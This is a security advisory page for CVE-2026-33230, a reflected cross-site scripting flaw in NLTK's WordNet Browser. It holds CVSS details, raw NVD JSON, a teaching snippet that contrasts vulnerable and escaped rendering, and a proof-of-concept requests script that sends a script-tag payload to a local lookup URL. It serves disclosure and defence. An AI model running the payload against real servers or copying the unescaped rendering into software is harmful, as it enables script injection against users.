Security Vulnerability Report
CVE-2026-33230 CVSS 6.1 MEDIUM

Published: 2026-03-20 23:16:47
Last Modified: 2026-03-23 19:14:50

Description

NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, `nltk.app.wordnet_app` contains a reflected cross-site scripting issue in the `lookup_...` route. A crafted `lookup_<payload>` URL can inject arbitrary HTML/JavaScript into the response page because attacker-controlled `word` data is reflected into HTML without escaping. This impacts users running the local WordNet Browser server and can lead to script execution in the browser origin of that application. Commit 1c3f799607eeb088cab2491dcf806ae83c29ad8f fixes the issue.
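The following Python is an added illustration written for this page, not NLTK's own handler code. It reproduces only the pattern the advisory describes: the `word` part of a `lookup_<word>` path is decoded and written into an HTML response. The route prefix, the page skeleton and the payload are assumptions for the example; the real `wordnet_app` markup differs. The hardened variant shows the one-line fix (escape for the HTML context after URL-decoding, never before), and `reflects_unescaped` is the check a tester applies to a captured response body to tell a vulnerable instance from a patched one.

```python
import html
from urllib.parse import unquote_plus

# Constructed stand-in for a "lookup_<word>" route. This is NOT nltk's code;
# it reproduces only the pattern the advisory describes: `word` is taken
# from the URL path and written into an HTML response.
ROUTE_PREFIX = "/lookup_"  # assumed path shape, matching the advisory text

# Constructed test payload: the usual XSS canary, not tied to any real page.
PAYLOAD = "<script>alert('xss')</script>"


def word_from_path(path: str) -> str:
    """Extract the attacker-controlled `word` from a lookup URL path."""
    if not path.startswith(ROUTE_PREFIX):
        raise ValueError(f"not a lookup route: {path!r}")
    # Decode percent-encoding first: a browser (or requests) sends
    # %3Cscript%3E on the wire and the raw '<' only exists after decoding.
    return unquote_plus(path[len(ROUTE_PREFIX):])


def vulnerable_page(path: str) -> str:
    """Unsafe rendering: `word` is interpolated into HTML verbatim (CWE-79)."""
    word = word_from_path(path)
    return f"<html><body><h1>Lookup: {word}</h1></body></html>"


def hardened_page(path: str) -> str:
    """Safe rendering: escape for the HTML text context before interpolating.

    quote=True also neutralises ' and " so the same helper is safe inside a
    quoted attribute value; it is still not sufficient for a JavaScript or
    URL context, which need their own encoders."""
    word = word_from_path(path)
    return f"<html><body><h1>Lookup: {html.escape(word, quote=True)}</h1></body></html>"


def reflects_unescaped(body: str, payload: str) -> bool:
    """Verification check against a captured response body: the bug is
    confirmed only if the payload comes back byte-for-byte. An entity-encoded
    copy (&lt;script&gt;) means the server escaped it."""
    return payload in body


if __name__ == "__main__":
    url_path = ROUTE_PREFIX + PAYLOAD
    for name, render in (("vulnerable", vulnerable_page), ("hardened", hardened_page)):
        body = render(url_path)
        print(f"{name:10s} reflected unescaped: {reflects_unescaped(body, PAYLOAD)}")
        print("    ", body)
```

The ordering in `word_from_path` matters: escaping before decoding would let `%3C` pass the escaper untouched and then decode back to `<` in the page. Escaping is also context-specific; `html.escape` covers element text and quoted attributes, which is the context the advisory describes, and nothing more.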

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:* - VULNERABLE
NLTK <= 3.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Proof of Concept for CVE-2026-33230
# Target: local NLTK WordNet Browser server (nltk.app.wordnet_app); adjust
# the port to the instance under test.
# Description: sends a crafted lookup_<payload> request and checks whether
# the payload is reflected into the HTML response without escaping.

target_host = "http://localhost:8000"

# The payload injects a JavaScript alert via the lookup route. The bug exists
# because the 'word' part of the URL is reflected into the page unescaped.
xss_payload = "<script>alert('CVE-2026-33230_POC');</script>"

# Construct the malicious URL based on the vulnerable pattern 'lookup_...'.
# requests percent-encodes '<' and '>' on the wire; the page is affected only
# if the server decodes them before building the response.
malicious_url = f"{target_host}/lookup_{xss_payload}"

print(f"[*] Sending request to: {malicious_url}")
try:
    response = requests.get(malicious_url, timeout=5)
    if response.status_code == 200:
        print("[+] Request successful.")
        print(f"[+] Response Content Length: {len(response.text)}")
        # A browser executes the alert only if the raw payload comes back
        # verbatim; an entity-encoded copy (&lt;script&gt;) means it is fixed.
        if xss_payload in response.text:
            print("[+] Payload reflected unescaped: vulnerability confirmed.")
        else:
            print("[-] Payload not reflected verbatim: likely patched.")
    else:
        print(f"[-] Unexpected status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

References

https://github.com/nltk/nltk/commit/1c3f799607eeb088cab2491dcf806ae83c29ad8f (Patch)
https://github.com/nltk/nltk/commit/40d0bc1d484a3458d6a63ecb5ba4957ab16ba14e (Patch)
https://github.com/nltk/nltk/security/advisories/GHSA-gfwx-w7gr-fvh7 (Exploit, Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33230",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T23:16:46.680",
    "lastModified": "2026-03-23T19:14:50.023",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, `nltk.app.wordnet_app` contains a reflected cross-site scripting issue in the `lookup_...` route. A crafted `lookup_<payload>` URL can inject arbitrary HTML/JavaScript into the response page because attacker-controlled `word` data is reflected into HTML without escaping. This impacts users running the local WordNet Browser server and can lead to script execution in the browser origin of that application. Commit 1c3f799607eeb088cab2491dcf806ae83c29ad8f fixes the issue."
      },
      {
        "lang": "es",
        "value": "NLTK (Natural Language Toolkit) es un conjunto de módulos Python de código abierto, conjuntos de datos y tutoriales que apoyan la investigación y el desarrollo en Procesamiento del Lenguaje Natural. En las versiones 3.9.3 y anteriores, `nltk.app.wordnet_app` contiene una vulnerabilidad de cross-site scripting reflejado en la ruta 'lookup_...'. Una URL 'lookup_' manipulada puede inyectar HTML/JavaScript arbitrario en la página de respuesta porque los datos 'word' controlados por el atacante se reflejan en HTML sin escapar. Esto afecta a los usuarios que ejecutan el servidor local de WordNet Browser y puede conducir a la ejecución de scripts en el origen del navegador de esa aplicación. El commit 1c3f799607eeb088cab2491dcf806ae83c29ad8f corrige la vulnerabilidad."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "3.9.3",
                "matchCriteriaId": "E3C35863-7D82-4EEF-BDE8-E94C559CF4FB"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/nltk/nltk/commit/1c3f799607eeb088cab2491dcf806ae83c29ad8f",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/nltk/nltk/commit/40d0bc1d484a3458d6a63ecb5ba4957ab16ba14e",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/nltk/nltk/security/advisories/GHSA-gfwx-w7gr-fvh7",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}